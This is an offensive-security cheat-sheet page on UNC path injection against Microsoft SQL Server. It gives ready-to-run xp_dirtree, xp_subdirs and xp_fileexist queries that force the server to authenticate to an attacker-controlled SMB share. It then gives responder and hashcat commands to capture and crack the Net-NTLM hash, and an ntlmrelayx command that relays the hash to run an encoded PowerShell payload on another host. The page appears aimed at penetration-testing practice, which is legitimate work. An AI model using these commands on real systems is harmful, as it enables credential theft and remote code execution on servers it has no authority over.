> For the complete documentation index, see [llms.txt](https://rfc1918.gitbook.io/offsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rfc1918.gitbook.io/offsec/services/ms-sql-server/unc-path-injection.md).

# UNC Path Injection

## Overview

This attack takes advantage of the xp\_dirtree procefure to force an SQL server to connect to a SMB share that the attacker controls, allow the attacker to capture the Net-NTLM hash of the SQL account to be cracked offline or relayed.&#x20;

## Examples

### xp\_dirtree

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_dirtree \"\\\\192.168.119.120\\\\test\";
```

{% endcode %}

### xp\_subdirs

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_subdirs\"\\\\192.168.119.120\\\\test\";
```

{% endcode %}

### xp\_fileexist

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_fileexist\"\\\\192.168.119.120\\\\test\";
```

{% endcode %}

## Capturing\Relaying the Net-NTLM

### Using responder to capture the Net-NTLM hash

{% code overflow="wrap" %}

```bash
sudo responder -I tap0

# hashcat command to crack the hash
hashcat -m 5600 hash.txt dict.txt --force
```

{% endcode %}

### Relaying the Net-NTLM hash

{% hint style="info" %}
SMB signing needs to be disabled to perform this attack.
{% endhint %}

{% code overflow="wrap" %}

```bash
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc <base64 encoded payload>'
```

{% endcode %}
